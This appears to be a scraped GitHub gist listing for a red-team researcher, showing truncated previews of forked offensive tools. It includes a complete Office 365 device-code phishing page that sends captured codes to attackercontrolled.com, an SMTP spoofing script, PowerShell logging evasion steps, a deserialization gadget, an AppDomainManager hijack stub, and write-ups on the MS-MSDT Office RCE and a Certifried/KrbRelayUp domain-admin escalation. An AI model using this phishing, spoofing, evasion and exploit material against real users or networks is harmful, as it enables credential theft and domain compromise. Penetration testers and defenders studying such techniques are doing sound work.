MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
Steve Borosh rvrsh3ll
rvrsh3ll
/ PowerShellNTFSStaticFileServer.ps1
Created
October 22, 2022 03:20
— forked from Tiberriver256/PowerShellNTFSStaticFileServer.ps1
This script starts a small web server listening on localhost:8080 that will impersonate the authenticated user and serve static content. This means if they do not have NTFS permissions to the file they will get an access denied or a 404 file not found if they do not have NTFS access to list contents of the directory.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DirectoryContent { | |
| <# | |
| .SYNOPSIS | |
| Function to get directory content | |
| .EXAMPLE | |
| Get-DirectoryContent -Path "C:\" -HeaderName "poshserver.net" -RequestURL "http://poshserver.net" -SubfolderName "/" | |
rvrsh3ll
/ gist:2139f0ae7869f268dec4c6007d434185
Created
October 10, 2022 06:39
— forked from ThunderGunExpress/gist:d221b316c94c4b7403f3179292c23ccb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //All credit goes to Ysoserial.net and the great @tiraniddo | |
| //Snippets copied from ysoserial.net | |
| //https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
| //https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.Serialization.Formatters.Binary; | |
| using System.IO; | |
| using System.Reflection; |
rvrsh3ll
/ info.txt
Created
October 5, 2022 18:09
— forked from hook-s3c/info.txt
Disable Powershell logging
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Logs are held by default in the user profile: | |
| \AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
| this directory also hosts per-application logs | |
| -------------------------------------------------------------- | |
| Disable Logging... | |
| remove-module psreadline |
rvrsh3ll
/ spoof.py
Created
October 3, 2022 20:33
— forked from ustayready/spoof.py
Simple unfinished SMTP spoof script for use with Office365 DirectSend SmartHosts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import smtplib | |
| from email.mime.text import MIMEText | |
| from email.mime.multipart import MIMEMultipart | |
| from email.mime.text import MIMEText | |
| from email.mime.base import MIMEBase | |
| from email import encoders | |
| import ssl | |
| import email | |
| import argparse |
rvrsh3ll
/ S3UpDown.ps1
Created
August 21, 2022 15:23
— forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Upload | |
| &{ | |
| $ErrorActionPreference = 'Stop' | |
| $AWSRegion = "us-east-1" | |
| $AWSAccessKeyId = "TODO: Access Key" | |
| $AWSSecretAccessKey = "TODO: Secret Access Key" | |
| $BucketName = "TODO: Bucket Name" | |
| [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null | |
| $OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog | |
| $OpenFileDialog.ShowDialog() | Out-Null |
rvrsh3ll
/ generate.html
Created
August 1, 2022 01:03
— forked from Mr-Un1k0d3r/generate.html
office device code phishing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- This page can be formatted to look like something more interesting --> | |
| <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
| <script> | |
| $.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) { | |
| $.get("https://attackercontrolled.com/?id=" + data.device_code); | |
| document.write(data.message); | |
| }); | |
| </script> |
rvrsh3ll
/ FindingComputersWithLocalAdmin.md
Created
June 29, 2022 15:59
— forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| public sealed class MyAppDomainManager : AppDomainManager | |
| { | |
| public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
| { |
rvrsh3ll
/ ms-msdt.MD
Created
May 30, 2022 15:24
— forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
- Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
rvrsh3ll
/ certifried_with_krbrelayup.md
Created
May 17, 2022 01:16
— forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites: